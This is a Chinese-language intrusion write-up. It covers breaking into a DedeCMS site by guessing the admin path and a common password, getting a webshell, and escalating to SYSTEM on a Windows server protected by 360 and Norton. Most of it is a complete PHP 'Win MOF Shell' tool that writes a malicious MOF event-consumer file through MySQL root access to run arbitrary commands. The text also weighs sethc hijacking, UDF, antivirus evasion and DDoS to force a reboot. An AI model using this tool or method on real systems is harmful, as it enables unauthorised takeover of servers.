索引
0x01 獲取webshell
0x02 繞過殺軟提權思路
0x03 mof 提權原理
0x04利用mysql寫入mof提權
0x05 總結
0x01 獲取webshell
在一次滲透中,獲取了內網主機若干,外網就只搞下2台主機,一直想對關鍵的業務服務器進行滲透,機緣巧合之下 看見目標主戰居然是dedecms,版本比較新是20150507 的,手上沒有0day,就靠基本思路后台--webshell來搞,先猜后台
/admin123 管理員名字+電話 /admin域名 域名+admin 域名+manage
猜到域名+admin 的時候,出來了dedecms的主站頁面, 拿管理員的常用密碼測試,進入后台獲取webshell
0x02 提權
進去一看,執行cmd不成功,分析看看是什么原因導致的呢? 執行phpinfo(); 看到disable_function這里把常用的敏感函數給禁止了
環境為apache+windows2008+諾頓+360,apache在windows上默認是已system權限上啟動的, 也就是說我們的webshell能直接修改任意文件了,在shell翻到了mysql的root密碼(默認情況下mysql也是root權限)
現在就有以下幾種思路:
1.覆蓋sethc或者放大鏡 2.mysql udf提權 3.mof提權 4.替換常用軟件,等管理員登錄來點擊 (添加shellcode) 5.在啟動項里增加bat,或者遠控,前提是遠控要免殺, bat直接加管理員會被360殺 ,缺點是要等電腦重啟,一般服務器重啟至少得等10.20天,等來黃花菜都涼了··· 要他重啟還可以流量ddos,或者用php把他cpu耗盡,自然也重啟了, 不過動作太大了 不太好。容易讓管理員意識到有人攻擊 6.dll 劫持
試常用的sehtc劫持和放大鏡劫持 直接被360干掉了,(本地360復現的)
測試mysql udf提權 提權的shell 被諾頓和360殺的不要不要的··慘··
測試替換常用軟件 ,看見管理員已經10多天沒有登錄, 不知道等他登錄要多久·· 而且免殺是個問題·· 遠控不免殺··
測試啟動項直接加用戶,尼瑪360又攔截··
問群里的大牛, 大牛說可以試試mof提權,
0x03 mof 提權原理
Windows 管理規范 (WMI) 提供了以下三種方法編譯到WMI存儲庫的托管對象格式 (MOF) 文件,其中一種是
拖放到%SystemRoot%\System32\Wbem\MOF文件夾的 MOF 文件。
wmi 是可以調用WScript.Shell 的,WScript.Shell 可以直接調用cmd執行文件,提權
0x04 利用mysql寫入mof提權
<?php
$path="c:/windows/system32/canimei";
session_start();
if(!empty($_POST['submit'])){
setcookie("connect");
setcookie("connect[host]",$_POST['host']);
setcookie("connect[user]",$_POST['user']);
setcookie("connect[pass]",$_POST['pass']);
setcookie("connect[dbname]",$_POST['dbname']);
echo "<script>location.href='?action=connect'</script>";
}
if(empty($_GET["action"])){
?>
<html>
<head><title>Win MOF Shell</title></head>
<body>
<form action="?action=connect" method="post">
Host:
<input type="text" name="host" value="192.168.200.144:3306"><br/>
User:
<input type="text" name="user" value="root"><br/>
Pass:
<input type="password" name="pass" value="toor"><br/>
DB:
<input type="text" name="dbname" value="mysql"><br/>
<input type="submit" name="submit" value="Submit"><br/>
</form>
</body>
</html>
<?php
exit;
}
if ($_GET[action]=='connect')
{
$conn=mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["user"],$_COOKIE["connect"]["pass"]) or die('<pre>'.mysql_error().'</pre>');
echo "<form action='' method='post'>";
echo "Cmd:";
echo "<input type='text' name='cmd' value='$strCmd'?>";
echo "<br>";
echo "<br>";
echo "<input type='submit' value='Exploit'>";
echo "</form>";
echo "<form action='' method='post'>";
echo "<input type='hidden' name='flag' value='flag'>";
echo "<input type='submit'value=' Read '>";
echo "</form>";
if (isset($_POST['cmd'])){
$strCmd=$_POST['cmd'];
$cmdshell='cmd /c '.$strCmd.'>'.$path;
$mofname="c:/windows/system32/wbem/mof/system.mof";
$payload = "#pragma namespace(\"\\\\\\\\\\\\\\\\.\\\\\\\\root\\\\\\\\subscription\")
instance of __EventFilter as \$EventFilter
{
EventNamespace = \"Root\\\\\\\\Cimv2\";
Name = \"filtP2\";
Query = \"Select * From __InstanceModificationEvent \"
\"Where TargetInstance Isa \\\\\"Win32_LocalTime\\\\\" \"
\"And TargetInstance.Second = 5\";
QueryLanguage = \"WQL\";
};
instance of ActiveScriptEventConsumer as \$Consumer
{
Name = \"consPCSV2\";
ScriptingEngine = \"JScript\";
ScriptText =
\"var WSH = new ActiveXObject(\\\\\"WScript.Shell\\\\\")\\\\nWSH.run(\\\\\"$cmdshell\\\\\")\";
};
instance of __FilterToConsumerBinding
{
Consumer = \$Consumer;
Filter = \$EventFilter;
};";
mysql_select_db($_COOKIE["connect"]["dbname"],$conn);
$sql1="select '$payload' into dumpfile '$mofname';";
if(mysql_query($sql1))
echo "<hr>Execute Successful!<br> Please click the read button to check the result!!<br>If the result is not correct,try read again later<br><hr>"; else die(mysql_error());
mysql_close($conn);
}
if(isset($_POST['flag']))
{
$conn=mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["user"],$_COOKIE["connect"]["pass"]) or die('<pre>'.mysql_error().'</pre>');
$sql2="select load_file(\"".$path."\");";
$result2=mysql_query($sql2);
$num=mysql_num_rows($result2);
while ($row = mysql_fetch_array($result2, MYSQL_NUM)) {
echo "<hr/>";
echo '<pre>'. $row[0].'</pre>';
}
mysql_close($conn);
}
}
?>
0x05 總結
猜后台>撞密碼>webshell>提權 的一個過程
參考連接:
http://www.waitalone.cn/mysql-tiquan-summary.html?replytocom=390
http://lcx.cc/?i=4048
http://blog.csdn.net/yiyefangzhou24/article/details/11760277